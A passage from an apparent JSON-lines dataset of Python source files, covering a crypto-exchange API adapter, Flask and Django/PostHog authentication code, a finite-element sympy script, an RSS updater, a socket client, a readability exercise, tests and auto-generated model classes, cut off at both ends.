nonce(self):\n return self.milliseconds()\n\n def fetch_transactions(self, code=None, since=None, limit=None, params={}):\n self.load_markets()\n request = {}\n if limit is not None:\n request['limit_transfers'] = limit\n if since is not None:\n request['timestamp'] = since\n response = self.privatePostV1Transfers(self.extend(request, params))\n return self.parse_transactions(response)\n\n def parse_transaction(self, transaction, currency=None):\n timestamp = self.safe_integer(transaction, 'timestampms')\n currencyId = self.safe_string(transaction, 'currency')\n code = self.safe_currency_code(currencyId, currency)\n address = self.safe_string(transaction, 'destination')\n type = self.safe_string_lower(transaction, 'type')\n status = 'pending'\n # When deposits show as Advanced or Complete they are available for trading.\n if transaction['status']:\n status = 'ok'\n fee = None\n feeAmount = self.safe_number(transaction, 'feeAmount')\n if feeAmount is not None:\n fee = {\n 'cost': feeAmount,\n 'currency': code,\n }\n return {\n 'info': transaction,\n 'id': self.safe_string(transaction, 'eid'),\n 'txid': self.safe_string(transaction, 'txHash'),\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'network': None,\n 'address': address,\n 'addressTo': None,\n 'addressFrom': None,\n 'tag': None, # or is it defined?\n 'tagTo': None,\n 'tagFrom': None,\n 'type': type, # direction of the transaction,('deposit' | 'withdraw')\n 'amount': self.safe_number(transaction, 'amount'),\n 'currency': code,\n 'status': status,\n 'updated': None,\n 'fee': fee,\n }\n\n def parse_deposit_address(self, depositAddress, currency=None):\n #\n # {\n # address: \"0xed6494Fe7c1E56d1bd6136e89268C51E32d9708B\",\n # timestamp: \"1636813923098\",\n # addressVersion: \"eV1\" }\n # }\n #\n address = self.safe_string(depositAddress, 'address')\n return {\n 'currency': currency,\n 'network': None,\n 'address': address,\n 'tag': None,\n 'info': depositAddress,\n }\n\n def fetch_deposit_addresses_by_network(self, code, params={}):\n self.load_markets()\n network = self.safe_string(params, 'network')\n if network is None:\n raise ArgumentsRequired(self.id + 'fetchDepositAddressesByNetwork() requires a network parameter')\n params = self.omit(params, 'network')\n networks = self.safe_value(self.options, 'networks', {})\n networkId = self.safe_string(networks, network, network)\n networkIds = self.safe_value(self.options, 'networkIds', {})\n networkCode = self.safe_string(networkIds, networkId, network)\n request = {\n 'network': networkId,\n }\n response = self.privatePostV1AddressesNetwork(self.extend(request, params))\n results = self.parse_deposit_addresses(response, [code], False, {'network': networkCode, 'currency': code})\n return self.group_by(results, 'network')\n\n def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):\n url = '/' + self.implode_params(path, params)\n query = self.omit(params, self.extract_params(path))\n if api == 'private':\n self.check_required_credentials()\n apiKey = self.apiKey\n if apiKey.find('account') < 0:\n raise AuthenticationError(self.id + ' sign() requires an account-key, master-keys are not-supported')\n nonce = self.nonce()\n request = self.extend({\n 'request': url,\n 'nonce': nonce,\n }, query)\n payload = self.json(request)\n payload = self.string_to_base64(payload)\n signature = self.hmac(payload, self.encode(self.secret), hashlib.sha384)\n headers = {\n 'Content-Type': 'text/plain',\n 'X-GEMINI-APIKEY': self.apiKey,\n 'X-GEMINI-PAYLOAD': self.decode(payload),\n 'X-GEMINI-SIGNATURE': signature,\n }\n else:\n if query:\n url += '?' + self.urlencode(query)\n url = self.urls['api'][api] + url\n return {'url': url, 'method': method, 'body': body, 'headers': headers}\n\n def handle_errors(self, httpCode, reason, url, method, headers, body, response, requestHeaders, requestBody):\n if response is None:\n if isinstance(body, basestring):\n feedback = self.id + ' ' + body\n self.throw_broadly_matched_exception(self.exceptions['broad'], body, feedback)\n return # fallback to default error handler\n #\n # {\n # \"result\": \"error\",\n # \"reason\": \"BadNonce\",\n # \"message\": \"Out-of-sequence nonce <1234> precedes previously used nonce <2345>\"\n # }\n #\n result = self.safe_string(response, 'result')\n if result == 'error':\n reason = self.safe_string(response, 'reason')\n message = self.safe_string(response, 'message')\n feedback = self.id + ' ' + message\n self.throw_exactly_matched_exception(self.exceptions['exact'], reason, feedback)\n self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)\n self.throw_broadly_matched_exception(self.exceptions['broad'], message, feedback)\n raise ExchangeError(feedback) # unknown message\n\n def create_deposit_address(self, code, params={}):\n self.load_markets()\n currency = self.currency(code)\n request = {\n 'currency': currency['id'],\n }\n response = self.privatePostV1DepositCurrencyNewAddress(self.extend(request, params))\n address = self.safe_string(response, 'address')\n self.check_address(address)\n return {\n 'currency': code,\n 'address': address,\n 'tag': None,\n 'info': response,\n }\n\n def fetch_ohlcv(self, symbol, timeframe='5m', since=None, limit=None, params={}):\n self.load_markets()\n market = self.market(symbol)\n request = {\n 'timeframe': self.timeframes[timeframe],\n 'symbol': market['id'],\n }\n response = self.publicGetV2CandlesSymbolTimeframe(self.extend(request, params))\n #\n # [\n # [1591515000000,0.02509,0.02509,0.02509,0.02509,0],\n # [1591514700000,0.02503,0.02509,0.02503,0.02509,44.6405],\n # [1591514400000,0.02503,0.02503,0.02503,0.02503,0],\n # ]\n #\n return self.parse_ohlcvs(response, market, timeframe, since, limit)\n"} {"ext": "py", "sha": "1a30de7f68d314dd049d90fb37b192f967c53371", "content": "import sympy as sym\n\n# Computing with Dirichlet conditions: -u''=2 and sines\nx, L = sym.symbols('x L')\ne_Galerkin = x*(L-x) - 8*L**2*sym.pi**(-3)*sym.sin(sym.pi*x/L)\ne_colloc = x*(L-x) - 2*L**2*sym.pi**(-2)*sym.sin(sym.pi*x/L)\n\n# Verify max error for x=L/2\ndedx_Galerkin = sym.diff(e_Galerkin, x)\nprint((dedx_Galerkin.subs(x, L/2)))\ndedx_colloc = sym.diff(e_colloc, x)\nprint((dedx_colloc.subs(x, L/2)))\n\n# Compute max error: x=L/2, evaluate numerical, and simplify\nprint(('Max error Galerkin/least.sq.:', \\\n sym.simplify(e_Galerkin.subs(x, L/2).evalf(n=3))))\nprint(('Max error colloc.:', \\\n sym.simplify(e_colloc.subs(x, L/2).evalf(n=3))))\nimport sys\n#sys.exit(0)\n\n\n# Computing with Neumann and Dirichlet conditions: -u''=2\nx, C, D = sym.symbols('x C D')\ni, j = sym.symbols('i j', integer=True)\n\nintegrand = (i+1)*(j+1)*(1-x)**(i+j)\nA_ij = sym.integrate(integrand, (x, 0, 1))\nA_ij = sym.simplify(A_ij)\nprint(A_ij)\npsi_i = (1-x)**(i+1)\nintegrand = 2*psi_i - D*(i+1)*(1-x)**i\nb_i = sym.integrate(integrand, (x, 0, 1)) - C*psi_i.subs(x, 0)\nb_i = sym.factor(sym.simplify(b_i))\nprint(b_i)\nprint((sym.expand(2 - (2+i)*(D+C))))\n\n# Solving model2 problem with f(x) and fe1D.py\nfrom u_xx_f_sympy import model2, x, C, D, L\nm = 2\nu = model2(x**m, L, C, D)\nprint(u)\n#u_exact = lambda x: D + C*(x-L) + (1./6)*(L**3 - x**3)\nu_exact = sym.lambdify([x, C, D, L], u)\n\nimport numpy as np\nfrom fe1D import finite_element1D_naive, mesh_uniform\n# Override C, D and L with numeric values\nC = 5\nD = 2\nL = 4\n\nd = 1\n\nvertices, cells, dof_map = mesh_uniform(\n N_e=2, d=d, Omega=[0,L], symbolic=False)\nvertices[1] = 3\nessbc = {}\nessbc[dof_map[-1][-1]] = D\n\nc, A, b, timing = finite_element1D_naive(\n vertices, cells, dof_map,\n essbc,\n ilhs=lambda e, phi, r, s, X, x, h:\n phi[1][r](X, h)*phi[1][s](X, h),\n irhs=lambda e, phi, r, X, x, h:\n x**m*phi[0][r](X),\n blhs=lambda e, phi, r, s, X, x, h: 0,\n brhs=lambda e, phi, r, X, x, h:\n -C*phi[0][r](-1) if e == 0 else 0,\n intrule='GaussLegendre',\n verbose=False,\n )\n\n# Visualize\nfrom fe1D import u_glob\nx, u, nodes = u_glob(c, cells, vertices, dof_map)\nu_e = u_exact(x, C, D, L)\nprint((u_exact(nodes, C, D, L) - c)) # difference at the nodes\nimport matplotlib.pyplot as plt\nplt.plot(x, u, 'b-', x, u_e, 'r--')\nplt.legend(['finite elements, d=%d' %d, 'exact'], loc='upper left')\nplt.savefig('tmp.png'); plt.savefig('tmp.pdf')\nplt.show()\n\n\n"} {"ext": "py", "sha": "1a30def6c9ec654c39777ee271e1182c32e9da01", "content": "# -*- coding: utf-8 -*-\n\n\"\"\"\n This module exports functions to initialize the Flask application.\n\"\"\"\n\nimport random\nfrom typing import Callable, Dict\n\nimport flask\nimport flask_babel\n\nimport orchard.errors\nimport orchard.extensions\nimport orchard.system_status\n\n\ndef create_app(config: str = 'Development') -> flask.Flask:\n \"\"\"\n Create and initialize the Flask application.\n\n :param config: The name of the configuration class, valid values are ``Development``\n (default), ``Production``, and ``Testing``.\n :return: The initialized Flask application.\n \"\"\"\n configuration_values = {'Development', 'Production', 'Testing'}\n if config in configuration_values:\n config = 'orchard.configuration.{config}'.format(config = config)\n else: # pragma: no cover.\n config = 'orchard.configuration.Development'\n\n name = __name__.split('.')[0]\n app = flask.Flask(name, instance_relative_config = True)\n app.config.from_object(config)\n app.config.from_object('instance.Configuration')\n\n # Always use English as default language during testing.\n if app.testing: # pragma: no branch.\n app.config['BABEL_DEFAULT_LOCALE'] = 'en'\n\n _configure_blueprints(app)\n _configure_context_processor(app)\n _configure_extensions(app)\n _configure_logging(app)\n _configure_request_handlers(app)\n\n return app\n\n\ndef _configure_blueprints(app: flask.Flask):\n \"\"\"\n Register the blueprints.\n\n :param app: The application instance.\n \"\"\"\n app.register_blueprint(orchard.errors.blueprint)\n app.register_blueprint(orchard.system_status.blueprint)\n\n\ndef _configure_context_processor(app: flask.Flask):\n \"\"\"\n Set up the global context processors.\n\n :param app: The application instance.\n \"\"\"\n\n @app.context_processor\n def inject_jinja2() -> Dict[str, Callable]:\n \"\"\"\n Inject more functions into the scope of Jinja2 templates.\n\n :return: A dictionary\n \"\"\"\n jinja2_functions = {\n 'hasattr': hasattr,\n 'random_int': random.randint\n }\n\n return jinja2_functions\n\n\ndef _configure_extensions(app: flask.Flask):\n \"\"\"\n Register the extensions with the app and configure them as needed.\n\n :param app: The application instance.\n \"\"\"\n orchard.extensions.babel.init_app(app)\n orchard.extensions.cache.init_app(app)\n\n\ndef _configure_logging(app: flask.Flask): # pragma: no cover.\n \"\"\"\n Set up a file and a mail logger, unless the app is being debugged or tested.\n\n :param app: The application instance.\n \"\"\"\n if app.debug or app.testing:\n return\n\n # noinspection PyUnresolvedReferences\n import logging\n import logging.handlers\n import os\n\n # Set up the file logger.\n log_path = app.config['LOG_PATH']\n if not os.path.isdir(log_path):\n os.makedirs(log_path)\n\n log_file = os.path.join(log_path, '{file_name}.log'.format(file_name = app.name))\n log_format = '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'\n file_handler = logging.handlers.RotatingFileHandler(log_file, 'a', 1 * 1024 * 1024, 10)\n file_handler.setLevel(logging.INFO)\n file_handler.setFormatter(logging.Formatter(log_format))\n app.logger.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('{name} Startup'.format(name = app.config['PROJECT_NAME']))\n\n # Set up the mail logger.\n if app.config.get('MAIL_SERVER', '') == '':\n return\n\n credentials = None\n if app.config['MAIL_USERNAME'] or app.config['MAIL_PASSWORD']:\n credentials = (app.config['MAIL_USERNAME'], app.config['MAIL_PASSWORD'])\n\n server = (app.config['MAIL_SERVER'], app.config['MAIL_PORT'])\n sender = app.config['MAIL_FROM']\n receivers = app.config['ADMINS']\n subject = '{name} Failure'.format(name = app.config['PROJECT_NAME'])\n secure = None\n if app.config['MAIL_SSL']:\n secure = ()\n mail_handler = logging.handlers.SMTPHandler(server, sender, receivers, subject, credentials,\n secure)\n mail_handler.setLevel(logging.ERROR)\n app.logger.addHandler(mail_handler)\n\n\ndef _configure_request_handlers(app: flask.Flask):\n \"\"\"\n Set up the global before and after request handlers.\n\n :param app: The application instance.\n \"\"\"\n\n @app.before_request\n def before_request():\n \"\"\"\n Set up a few things before handling the actual request.\n \"\"\"\n flask.g.locale = flask_babel.get_locale()\n flask.g.project_name = app.config['PROJECT_NAME']\n\n # Set a default title.\n flask.g.title = app.config['PROJECT_NAME']\n\n @app.after_request\n def after_request(response: flask.Response) -> flask.Response:\n \"\"\"\n Modify the response after the request has been handled.\n\n :return: The modified response.\n \"\"\"\n # http://www.gnuterrypratchett.com/\n response.headers.add(\"X-Clacks-Overhead\", \"GNU Terry Pratchett\")\n\n return response\n"} {"ext": "py", "sha": "1a30df187b06ad1ada7e013edba49b48570bd05e", "content": "import functools\nimport re\nfrom typing import Any, Dict, Optional, Tuple, Union\nfrom urllib.parse import urlsplit\n\nfrom django.apps import apps\nfrom django.contrib.auth.models import AnonymousUser\nfrom django.http import HttpRequest, JsonResponse\nfrom django.utils import timezone\nfrom rest_framework import authentication\nfrom rest_framework.exceptions import AuthenticationFailed\nfrom rest_framework.request import Request\n\n\nclass PersonalAPIKeyAuthentication(authentication.BaseAuthentication):\n \"\"\"A way of authenticating with personal API keys.\n Only the first key candidate found in the request is tried, and the order is:\n 1. Request Authorization header of type Bearer.\n 2. Request body.\n 3. Request query string.\n \"\"\"\n\n keyword = \"Bearer\"\n\n @classmethod\n def find_key_with_source(\n cls,\n request: Union[HttpRequest, Request],\n request_data: Optional[Dict[str, Any]] = None,\n extra_data: Optional[Dict[str, Any]] = None,\n ) -> Optional[Tuple[str, str]]:\n \"\"\"Try to find personal API key in request and return it along with where it was found.\"\"\"\n if \"HTTP_AUTHORIZATION\" in request.META:\n authorization_match = re.match(fr\"^{cls.keyword}\\s+(\\S.+)$\", request.META[\"HTTP_AUTHORIZATION\"])\n if authorization_match:\n return authorization_match.group(1).strip(), \"Authorization header\"\n data = request.data if request_data is None and isinstance(request, Request) else request_data\n\n if data and \"personal_api_key\" in data:\n return data[\"personal_api_key\"], \"body\"\n if \"personal_api_key\" in request.GET:\n return request.GET[\"personal_api_key\"], \"query string\"\n if extra_data and \"personal_api_key\" in extra_data:\n # compatibility with /capture endpoint\n return extra_data[\"personal_api_key\"], \"query string data\"\n return None\n\n @classmethod\n def find_key(\n cls,\n request: Union[HttpRequest, Request],\n request_data: Optional[Dict[str, Any]] = None,\n extra_data: Optional[Dict[str, Any]] = None,\n ) -> Optional[str]:\n \"\"\"Try to find personal API key in request and return it.\"\"\"\n key_with_source = cls.find_key_with_source(request, request_data, extra_data)\n return key_with_source[0] if key_with_source is not None else None\n\n @classmethod\n def authenticate(cls, request: Union[HttpRequest, Request]) -> Optional[Tuple[Any, None]]:\n personal_api_key_with_source = cls.find_key_with_source(request)\n if not personal_api_key_with_source:\n return None\n personal_api_key, source = personal_api_key_with_source\n PersonalAPIKey = apps.get_model(app_label=\"posthog\", model_name=\"PersonalAPIKey\")\n try:\n personal_api_key_object = (\n PersonalAPIKey.objects.select_related(\"user\").filter(user__is_active=True).get(value=personal_api_key)\n )\n except PersonalAPIKey.DoesNotExist:\n raise AuthenticationFailed(detail=f\"Personal API key found in request {source} is invalid.\")\n personal_api_key_object.last_used_at = timezone.now()\n personal_api_key_object.save()\n assert personal_api_key_object.user is not None\n return personal_api_key_object.user, None\n\n @classmethod\n def authenticate_header(cls, request) -> str:\n return cls.keyword\n\n\nclass TemporaryTokenAuthentication(authentication.BaseAuthentication):\n def authenticate(self, request: Request):\n # if the Origin is different, the only authentication method should be temporary_token\n # This happens when someone is trying to create actions from the editor on their own website\n if (\n request.headers.get(\"Origin\")\n and urlsplit(request.headers[\"Origin\"]).netloc not in urlsplit(request.build_absolute_uri(\"/\")).netloc\n ):\n if not request.GET.get(\"temporary_token\"):\n raise AuthenticationFailed(\n detail=\"No temporary_token set. \"\n + \"That means you're either trying to access this API from a different site, \"\n + \"or it means your proxy isn't sending the correct headers. \"\n + \"See https://posthog.com/docs/deployment/running-behind-proxy for more information.\"\n )\n if request.GET.get(\"temporary_token\"):\n User = apps.get_model(app_label=\"posthog\", model_name=\"User\")\n user = User.objects.filter(temporary_token=request.GET.get(\"temporary_token\"))\n if not user.exists():\n raise AuthenticationFailed(detail=\"User doesn't exist\")\n return (user.first(), None)\n return None\n\n\nclass PublicTokenAuthentication(authentication.BaseAuthentication):\n def authenticate(self, request: Request):\n if request.GET.get(\"share_token\") and request.parser_context and request.parser_context.get(\"kwargs\"):\n Dashboard = apps.get_model(app_label=\"posthog\", model_name=\"Dashboard\")\n dashboard = Dashboard.objects.filter(\n share_token=request.GET.get(\"share_token\"), pk=request.parser_context[\"kwargs\"].get(\"pk\"),\n ).first()\n if dashboard is None:\n raise AuthenticationFailed(detail=\"Dashboard doesn't exist\")\n if dashboard.team.organization.for_internal_metrics:\n return None\n return (AnonymousUser(), None)\n return None\n\n\ndef authenticate_secondarily(endpoint):\n \"\"\"\n DEPRECATED: Used for supporting legacy endpoints not on DRF.\n Authentication for function views.\n \"\"\"\n\n @functools.wraps(endpoint)\n def wrapper(request: HttpRequest):\n if not request.user.is_authenticated:\n try:\n auth_result = PersonalAPIKeyAuthentication.authenticate(request)\n if isinstance(auth_result, tuple) and auth_result[0].__class__.__name__ == \"User\":\n request.user = auth_result[0]\n else:\n raise AuthenticationFailed(\"Authentication credentials were not provided.\")\n except AuthenticationFailed as e:\n return JsonResponse({\"detail\": e.detail}, status=401)\n return endpoint(request)\n\n return wrapper\n"} {"ext": "py", "sha": "1a30e0a3525f29b83a01f77bce16e1f125b7a3b9", "content": "import attr\nimport logging\nimport os\n\nfrom datetime import datetime\nfrom feedparser import parse as parse_feed\nfrom typing import List, Optional\n\nfrom telegram_rss.config import FeedConfig\nfrom telegram_rss.utils import save_as, get_default_directory, load_dict\nfrom . import Entry, Channel, Feed\n\n\nclass FeedUpdater:\n def __init__(self, feed_config: FeedConfig, ext: str = \".json\"):\n self.feed_config = feed_config\n self._feed: Optional[Feed] = None\n self._local_feed: Optional[Feed] = None\n self.local_file = os.path.join(\n get_default_directory(),\n \"data\",\n f\"{self.feed_config.name}\" + ext,\n )\n self.logger = logging.getLogger(feed_config.name)\n\n def __call__(self, save: bool = True) -> List[Entry]:\n return self.get_new_entries(save=save)\n\n def get_new_entries(self, save: bool = True) -> List[Entry]:\n entries: List[Entry] = list()\n if not self.feed or self.feed == self.local_feed:\n self.logger.info(\"No new feeds found\")\n return entries\n for feed in self.feed:\n if feed in entries:\n continue\n if feed not in self.local_feed:\n entries.append(feed)\n if not entries:\n self.logger.debug(\"All feeds aleady in local_feeds\")\n return entries\n if self.feed_config.only_today:\n self.logger.debug(\"Filter feeds published only today\")\n now = datetime.now()\n for i in range(len(entries)):\n entry = entries[i]\n if not entry.time:\n continue\n if entry.time.date() == now.date():\n continue\n else:\n del entries[i]\n self.logger.info(f\"Found new {len(entries)} feeds\")\n if entries and save:\n self.save_feed(self.feed)\n self.logger.debug(f\"Saved {len(entries)} as {self.local_file}\")\n return entries\n\n @property\n def feed(self) -> Feed:\n if self._feed:\n return self._feed\n if self.feed_config.save_bandwith:\n raw_feed = parse_feed(\n self.feed_config.source,\n etag=self.feed_config.etag,\n modified=self.feed_config.modified,\n )\n else:\n raw_feed = parse_feed(self.feed_config.source)\n if raw_feed.status == 304:\n return Feed()\n self.feed_config.etag = raw_feed.etag\n self.feed_config.modified = raw_feed.modified\n self._feed = Feed.from_feedparser(raw_feed)\n return self._feed\n\n @property\n def local_feed(self) -> Feed:\n if self._local_feed:\n return self._local_feed\n if not os.path.isfile(self.local_file):\n return Feed()\n feed_data = load_dict(self.local_file)\n self._local_feed = Feed(**feed_data)\n return self._local_feed\n\n def save_feed(self, feed: Feed):\n feed_data = attr.asdict(feed, recurse=True)\n save_as(feed_data, self.local_file)\n\n @property\n def channel(self) -> Optional[Channel]:\n return self.feed.channel or self.local_feed.channel\n"} {"ext": "py", "sha": "1a30e27f6752935ad2570aabd89899bbd08e2c0c", "content": "#Imports library\nimport socket\n\n#Creates instance of 'Socket'\ns = socket.socket()\n\nhostname = 'tutorialspi' #Server IP/Hostname\nport = 8000 #Server Port\n\ns.connect((hostname,port)) #Connects to server\n\nwhile True:\n x = raw_input(\"Enter message: \") #Gets the message to be sent\n s.send(x.encode()) #Encodes and sends message (x)\n"} {"ext": "py", "sha": "1a30e28713306fca74d538ca5d38151d109a7df6", "content": "from cs50 import get_string\nimport re\n\ndef letters_counter(t, a):\n c = 0\n for i in t:\n if i in a or i in [j.upper() for j in a]:\n c += 1\n return c\n\ndef words_counter(t):\n match = re.split(\" \", t)\n return len(match)\n\ndef sentences_counter(t):\n match = re.split(\"[.!?]\", t)\n return len(match) - 1\n\ndef calculate(lc, wc, sc):\n l = (lc / wc) * 100\n s = (sc / wc) * 100\n index = 0.0588 * l - 0.296 * s - 15.8\n return round(index)\n\nalphabet = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"u\", \"v\", \"w\", \"x\", \"y\", \"z\"]\n\ntext = get_string(\"Text: \")\n\nletter_count = letters_counter(text, alphabet)\nword_count = words_counter(text)\nsentece_count = sentences_counter(text)\n\ncalc = calculate(letter_count, word_count, sentece_count)\n\nif calc < 1:\n print(\"Before Grade 1\")\nelif calc >= 16:\n print(\"Grade 16+\")\nelse:\n print(f\"Grade {calc}\")"} {"ext": "py", "sha": "1a30e2c0feb5cde5e43ac6cc54319171ee726324", "content": "import pytest\n\nfrom .common import JSON, Cookies, Headers, Query, Resp, get_paths\nfrom .test_plugin_falcon import api as falcon_api\nfrom .test_plugin_flask import api as flask_api\nfrom .test_plugin_flask_blueprint import api as flask_bp_api\nfrom .test_plugin_flask_view import api as flask_view_api\nfrom .test_plugin_starlette import api as starlette_api\n\n\n@pytest.mark.parametrize(\n \"api\", [flask_api, flask_bp_api, flask_view_api, falcon_api, starlette_api]\n)\ndef test_plugin_spec(api):\n models = {\n m.__name__: m.schema(ref_template=\"#/components/schemas/{model}\")\n for m in (Query, JSON, Resp, Cookies, Headers)\n }\n for name, schema in models.items():\n assert api.spec[\"components\"][\"schemas\"][name] == schema\n\n assert api.spec[\"tags\"] == [{\"name\": tag} for tag in (\"test\", \"health\", \"api\")]\n\n assert get_paths(api.spec) == [\n \"/api/user/{name}\",\n \"/api/user_annotated/{name}\",\n \"/ping\",\n ]\n\n ping = api.spec[\"paths\"][\"/ping\"][\"get\"]\n assert ping[\"tags\"] == [\"test\", \"health\"]\n assert ping[\"parameters\"][0][\"in\"] == \"header\"\n assert ping[\"summary\"] == \"summary\"\n assert ping[\"description\"] == \"description\"\n assert ping[\"operationId\"] == \"get_/ping\"\n\n user = api.spec[\"paths\"][\"/api/user/{name}\"][\"post\"]\n assert user[\"tags\"] == [\"api\", \"test\"]\n assert (\n user[\"requestBody\"][\"content\"][\"application/json\"][\"schema\"][\"$ref\"]\n == \"#/components/schemas/JSON\"\n )\n assert len(user[\"responses\"]) == 3\n\n params = user[\"parameters\"]\n for param in params:\n if param[\"in\"] == \"path\":\n assert param[\"name\"] == \"name\"\n elif param[\"in\"] == \"query\":\n assert param[\"name\"] == \"order\"\n"} {"ext": "py", "sha": "1a30e2c66974a7d59914df556af92bb1590f9655", "content": "from sqlalchemy.orm import Session\nfrom fastapi import Depends, Security\nfrom starlette.requests import Request\n\nfrom app.core.jwt import validate_token, reusable_oauth2\nfrom app.api.utils.db import get_db\n\n\ndef get_current_user(request: Request, token: str = Security(reusable_oauth2)):\n print(token)\n return request.state.user\n\n\ndef get_validated_current_user(db: Session = Depends(get_db), token: str = Security(reusable_oauth2)): # yapf: disable\n return validate_token(db, token)\n"} {"ext": "py", "sha": "1a30e3f815910632b27d740eb900bc201b72cffd", "content": "from os.path import dirname, basename, isfile, join\nimport glob\n\nmodules = glob.glob(join(dirname(__file__), '*.py'))\n__all__ = [basename(f)[:-3] for f in modules if isfile(f) and not f.endswith('__init__.py')]"} {"ext": "py", "sha": "1a30e4e56a5cb708fa316d595117561f9149bfae", "content": "import os\nimport argparse\nimport re\n\nimport utils\n\n\ndef aws_refresh_report(manifest, fname):\n \"\"\"\n Generate a aws refresh report by looking into the log file\n generated during aws refresh script running. The output is a report\n containing the number of files is copied, total amount in GB was copied\n\n Args:\n manifest(tsv): GDC manifest (active or legacy)\n fname(str): the log file of running aws refresh script\n \"\"\"\n try:\n with open(fname) as f:\n content = f.readlines()\n except IOError as e:\n print(e)\n os._exit(1)\n\n lines = [x.strip() for x in content]\n\n total_copying_files = 0\n total_data = 0\n awscli_copied_objects = set()\n awscli_copied_data = 0\n streaming_copied_objects = set()\n streaming_copied_data = 0\n\n \n for line in lines:\n pattern = \"Total files need to be replicated: (.*)$\"\n m = re.search(pattern, line)\n if m:\n total_copying_files = max(total_copying_files, int(m.group(1)))\n\n pattern = \".*aws s3 mv s3://.*/(.{36})/.*\"\n m = re.search(pattern, line)\n if m:\n awscli_copied_objects.add(m.group(1))\n\n pattern = \".*aws s3 cp s3://gdcbackup/(.{36})/.*\"\n m = re.search(pattern, line)\n if m:\n awscli_copied_objects.add(m.group(1))\n\n pattern = \"successfully stream file (.{36})/.*\"\n m = re.search(pattern, line)\n if m:\n streaming_copied_objects.add(m.group(1))\n\n files, headers = utils.get_fileinfo_list_from_csv_manifest(manifest)\n file_dict = {}\n for fi in files:\n file_dict[fi[\"id\"]] = fi\n\n manifest_copied_files = 0\n for uuid in awscli_copied_objects:\n if uuid in file_dict:\n manifest_copied_files +=1\n awscli_copied_data += file_dict[uuid][\"size\"]*1.0/1024/1024/1024\n \n for uuid in streaming_copied_objects:\n if uuid in file_dict:\n manifest_copied_files +=1\n streaming_copied_data += file_dict[uuid][\"size\"]*1.0/1024/1024/1024\n\n report = \"\"\"\n Number of files need to be copied {}. Total {} (GiB)\n Number of files were copied successfully via aws cli {}. Total {}(GiB)\n Number of files were copied successfully via gdc api {}. Total {}(GiB)\n \"\"\".format(\n total_copying_files,\n total_data,\n len(awscli_copied_objects),\n awscli_copied_data,\n len(streaming_copied_objects),\n streaming_copied_data\n )\n\n print(report)\n\n copied_files = []\n for uuid in awscli_copied_objects.union(streaming_copied_objects):\n if uuid in file_dict:\n copied_files.append(file_dict[uuid])\n\n print(\"Saving list of copied files\")\n utils.write_csv(manifest.split(\"/\")[-1][:-4] + \"_aws_copied.tsv\", copied_files, fieldnames=headers)\n return report\n\ndef aws_refresh_validate(fname):\n \"\"\"\n Validate the aws data refresh by looking into the log after validation\n script finished.\n \"\"\"\n try:\n with open(fname) as f:\n content = f.readlines()\n except IOError as e:\n print(e)\n print(\"Please run the dcf validation job first\")\n os._exit(1)\n\n lines = [x.strip() for x in content]\n for line in lines:\n if \"TOTAL AWS COPY FAILURE CASES\" in line:\n print(line)\n return False\n return True\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(title=\"action\", dest=\"action\")\n\n aws_refresh_cmd = subparsers.add_parser(\"aws_refresh_report\")\n aws_refresh_cmd.add_argument(\"--manifest\", required=True)\n aws_refresh_cmd.add_argument(\"--log_file\", required=True)\n\n aws_validate_cmd = subparsers.add_parser(\"aws_refresh_validate\")\n aws_validate_cmd.add_argument(\"--manifest\", required=True)\n aws_validate_cmd.add_argument(\"--log_file\", required=True)\n\n return parser.parse_args()\n\ndef main():\n args = parse_arguments()\n fname = args.log_file\n manifest = args.manifest\n\n if args.action == \"aws_refresh_report\":\n aws_refresh_report(manifest, fname)\n elif args.action == \"aws_refresh_validate\":\n if aws_refresh_validate(fname):\n print(\"All the files in the manifest have been copied to aws dcf buckets\")\n else:\n print(\"The manifest validation fails\")\n\n\nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a30e56323ca7c988e51a1356d3ea28a9c3f27a9", "content": "# coding=utf-8\n# --------------------------------------------------------------------------\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass MicrosoftgraphcalendarGroup(Model):\n \"\"\"MicrosoftgraphcalendarGroup.\n\n :param id:\n :type id: str\n :param name:\n :type name: str\n :param class_id:\n :type class_id: str\n :param change_key:\n :type change_key: str\n :param calendars:\n :type calendars: list[~users.models.Microsoftgraphcalendar]\n \"\"\"\n\n _attribute_map = {\n 'id': {'key': 'id', 'type': 'str'},\n 'name': {'key': 'name', 'type': 'str'},\n 'class_id': {'key': 'classId', 'type': 'str'},\n 'change_key': {'key': 'changeKey', 'type': 'str'},\n 'calendars': {'key': 'calendars', 'type': '[Microsoftgraphcalendar]'},\n }\n\n def __init__(self, id=None, name=None, class_id=None, change_key=None, calendars=None):\n super(MicrosoftgraphcalendarGroup, self).__init__()\n self.id = id\n self.name = name\n self.class_id = class_id\n self.change_key = change_key\n self.calendars = calendars\n"} {"ext": "py", "sha": "1a30e57001c8cc5aa33737bd6d5005b00ce4a8d5", "content": "from collections import OrderedDict\nfrom collections.abc import Iterable\n\nfrom cached_property import cached_property\nimport numpy as np\nimport sympy\n\nfrom devito.finite_differences.finite_difference import (generic_derivative,\n first_derivative,\n cross_derivative)\nfrom devito.finite_differences.differentiable import Differentiable\nfrom devito.finite_differences.tools import direct, transpose\nfrom devito.tools import as_mapper, as_tuple, filter_ordered, frozendict\nfrom devito.types.array import Array\nfrom devito.types.dimension import StencilDimension\nfrom devito.types.utils import DimensionTuple\n\n__all__ = ['Derivative', 'Weights']\n\n\nclass Derivative(sympy.Derivative, Differentiable):\n\n \"\"\"\n An unevaluated Derivative, which carries metadata (Dimensions,\n derivative order, etc) describing how the derivative will be expanded\n upon evaluation.\n\n Parameters\n ----------\n expr : expr-like\n Expression for which the Derivative is produced.\n dims : Dimension or tuple of Dimension\n Dimenions w.r.t. which to differentiate.\n fd_order : int or tuple of int, optional\n Coefficient discretization order. Note: this impacts the width of\n the resulting stencil. Defaults to 1.\n deriv_order: int or tuple of int, optional\n Derivative order. Defaults to 1.\n side : Side or tuple of 